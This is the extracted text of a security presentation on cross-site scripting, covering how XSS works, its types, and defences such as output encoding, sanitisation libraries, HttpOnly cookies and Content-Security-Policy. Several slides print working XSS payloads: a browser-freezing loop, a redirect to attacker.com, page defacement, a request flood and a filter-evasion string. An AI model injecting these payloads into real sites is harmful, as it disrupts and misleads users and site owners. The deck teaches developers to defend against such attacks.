![Page 1: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/1.jpg)
Devouring Security
Insufficient Data Validation Risks
Cross Site Scripting
Marudhamaran Gunasekaran
Watch the screen recording of the presentation at https://vimeo.com/106302349
![Page 2: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/2.jpg)
disclaimer
• Techniques and Tools in this presentation should be used or applied on an application, only with prior consent of the application’s owner. Illegal otherwise.
![Page 3: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/3.jpg)
Irrational fear of risks against our children
https://www.schneier.com/blog/archives/2014/08/irrational_fear.html
![Page 4: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/4.jpg)
Perfect security?
http://infosanity.files.wordpress.com/2010/06/dilbert-securitycia.gif
![Page 5: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/5.jpg)
Information Security Triangle
![Page 6: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/6.jpg)
XSS
• Html equivalent of Sql injection? Some say – it indeed is• “Breaking out of a data context and entering a code context” – Jeff
Williams, Chairperson, OWASP
![Page 7: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/7.jpg)
XSS Anatomy
• Benign Input: http://app:8020/odern/AdvSearch?q=xxxxx• Input: xxxxx | Output: xxxxx
• Malicious Input: http://app:8020/odern/AdvSearch?q=<em>xxxxx</em>• Input: <em>xxxxx</em> | Output: <em>xxxxx</em>
• Malicious Input failure: http://app:8020/odern/AdvSearch?q=<em>xxxxx</em>• Input: <em>xxxxx</em> | Output: <em>xxxxx</em>
![Page 8: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/8.jpg)
XSS Anatomy
• Remember your high school?
How you used to print a < > symbol on a html page by < >
![Page 9: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/9.jpg)
Parsers in Browsers
Html Parser
CSS Parser
JavaScript Parser
![Page 10: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/10.jpg)
XSS
• Breaking out of data context and entering the code context?
• By Code context? Do I mean?• Html markup• Html attributes• JavaScript• CSS (not the XSS CSS, but the Cascading Style Sheet CSS)• xml
![Page 11: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/11.jpg)
Sources of untrusted data
• Url• Form data• Cookies• Request headers
• External services• Database
Request[“data”]$_REQUESTrequest.getParameter
![Page 12: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/12.jpg)
Demo: XSS 101
• We know <script>alert(‘xss’);</script>
how about some Samy script?
![Page 13: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/13.jpg)
Samy - http://namb.la/popular/tech.html
Formatted code: http://security.stackexchange.com/questions/37362/why-is-the-samy-worm-considered-xss
![Page 14: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/14.jpg)
http://www.zdnet.com/tweetdeck-xss-worm-goes-viral-7000030436/
![Page 15: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/15.jpg)
Auto send FB credentials to the Tunisian government via inserted javascript on non-https connection
![Page 16: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/16.jpg)
XSS Types
• Type 0 – DOM Based• Type 1 – Reflected or Non-persistent XSS• Type 2 – Persistent or Stored XSS
![Page 17: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/17.jpg)
Demo: Cookie hijacking and Privilege Escalation• Face/Off with John Travolta and Nicolas Cage
![Page 18: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/18.jpg)
Demo: Cookie hijacking and Privilege Escalation• John Travolta – FBI• Nicolas Cage – Terrorist that planted the bomb.
• Where is the bomb? John Travolta would find it by tricking Nicolas Cage
![Page 19: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/19.jpg)
My fave Payload: Dos the client
<script>var j=0;while(true){++j;setTimeout(function(){var i=0;while(true){++i;setTimeout(function(){var w=0;while(true){w++;}},0);}},0);}</script>
![Page 20: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/20.jpg)
My fave Payload: Redirection
• <script>window.top.location=http://www.attacker.com;</script>
![Page 21: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/21.jpg)
My fave Payload: Defacing
• <script>document.body.background=http://1.bp.blogspot.com/-ISLWH3-kFpo/Uai4UHCOcrI/AAAAAAAAAmA/a6y9Nq3Bk0g/s1600/logo_blue.gif;</script>
![Page 22: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/22.jpg)
My fave Payload: Short XHR
• <script>cn=1;while(true){++cn;var w=window,r=w.XMLHttpRequest,j;if(r)r=new r();else for(j in{"Msxml2":1,"Microsoft":1})try{r=new ActiveXObject(j+".XMLHTTP");break}catch(e){}r.open("GET",document.location,false);r.send("");}</script>
• Better yet.. If you have jQuery
<script>$.get('http://prowarenesssecurity:8000/Pss/c.aspx‘);</script>
![Page 23: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/23.jpg)
Input Sanitization
• Blacklist• Stop anything that starts with a < and followed by a character• Stop any words such as script, javascript, alert, xss• Stop the < > , “ ‘
• Fails because of elimentary evasive techniques like• <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet(Rsnake)
![Page 24: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/24.jpg)
Blacklist vs Whitelist
• Blacklist – Don’t allow just the bad things I tell you, rest is fine
• What is bad? – anything that is bad today, anything the developer thinks
• Whitelist – Allow only these, I don’t care about the rest• What is good? – anything the business requires in the functionality
![Page 25: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/25.jpg)
Don’t write your own Input Sanitizers• http://blog.codinghorror.com/protecting-your-cookies-httponly/
![Page 26: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/26.jpg)
AntiXss libraries
• Microsoft AntiXss• AntiSamy for .Net, AntiSamy for Java• Reform for php
![Page 27: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/27.jpg)
Microsoft AntiXss
• InputSanitizer• For purifying html input
• Encoder• For output encodring
![Page 28: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/28.jpg)
Output encoding libraries
• https://www.owasp.org/index.php/OWASP_Java_Encoder_Project
![Page 29: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/29.jpg)
HttpOnly please!
![Page 30: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/30.jpg)
Framework protections
• Ruby on Rails, ASP.Net MVC• XSS protections by default by output encoding
• But why developers don’t like it?• Why do they want to turn the framework protections off?
• Because they just do not want output encoding by default because it just does not look right• Because they want plain html to be rendered at the UI
• Say hello to ASP.Net MVC’s Html.Raw()
![Page 31: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/31.jpg)
Framework Protections – Input validations• ASP.Net’s Request Validation
• Why is it there? When does it get triggered? Could we bypass it? Sure.
• <httpRuntime requestValidationMode="2.0" />• AllowHtml• ValidateInput(false)• ValidateRequest=false• Request.Unvalidated….
Use explicit input validation, or AntiXss librarieswhen you have request validations turned off
![Page 32: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/32.jpg)
Browser defenses
• IE• Chrome• Safari
• X-XSS-Protection: 1; mode=block
![Page 33: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/33.jpg)
Browser defenses and bypasses
• https://www.sysdream.com/sites/default/files/Abusing_IE8s_XSS_Filters%20(1).pdf
• https://blog.whitehatsec.com/internet-explorer-xss-filter/
• http://blog.elevenpaths.com/2014/01/how-to-bypass-antixss-filter-in-chrome.html
![Page 34: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/34.jpg)
XSS Defences
• NoScript addon• Content-Security-Policy [No wide browser support yet especially IE]
![Page 35: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/35.jpg)
Content Security Policy
• ‘xxx’ is the only domain you should my• Scripts• Styles• Images• Objects
from
![Page 36: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/36.jpg)
Content Security Policy
• Blocking mode• Reporting mode
![Page 39: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/39.jpg)
Tools: Watcher Addon for Fiddler (Passive scanning)
![Page 40: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/40.jpg)
Tools: Xss Me addon for firefox (Active Scanning)• Demonstration at http://testfire.net/
![Page 41: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/41.jpg)
Tools: Xenotix XSS Exploit Framework
![Page 42: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/42.jpg)
Tools: ModSecurity (Web Application Firewall)
![Page 43: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/43.jpg)
Tools: Zed Attack Proxy
![Page 44: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/44.jpg)
Tools: Commercial tools?
• Go figure, shell out
![Page 45: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/45.jpg)
XSS: Spot during code review
Source: 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them
![Page 46: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/46.jpg)
XSS: Spot during code review
Source: 24 Deadly Sins of Software Security: Programming Flaws and How to Fix Them
![Page 47: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/47.jpg)
![Page 48: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/48.jpg)
Output encoding options
• php: • echo htmlentities($name)• ASP.Net code behind: • lblName.Text = "Hello, " + HttpUtility.HtmlEncode(txtValue.Text);• lblName.Text = "Hello," + AntiXss.HtmlEncode txtValue.Text);• ASPX view engine : • <%: data %>• Razor view engine: • @data
![Page 49: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/49.jpg)
Code Review Tools
• Cat.Net still works with little tweaking on al older code base• Visual Code Grepper
![Page 50: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/50.jpg)
Popular cheatsheets for XSS prevention• https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
• http://opensecurity.in/the-ultimate-xss-protection-cheat-sheet-for-developers/
![Page 51: Devouring Security Insufficient data validation risks Cross Site Scripting](https://reader036.vdocuments.us/reader036/viewer/2022062419/558654b4d8b42a6d128b464b/html5/thumbnails/51.jpg)
:q!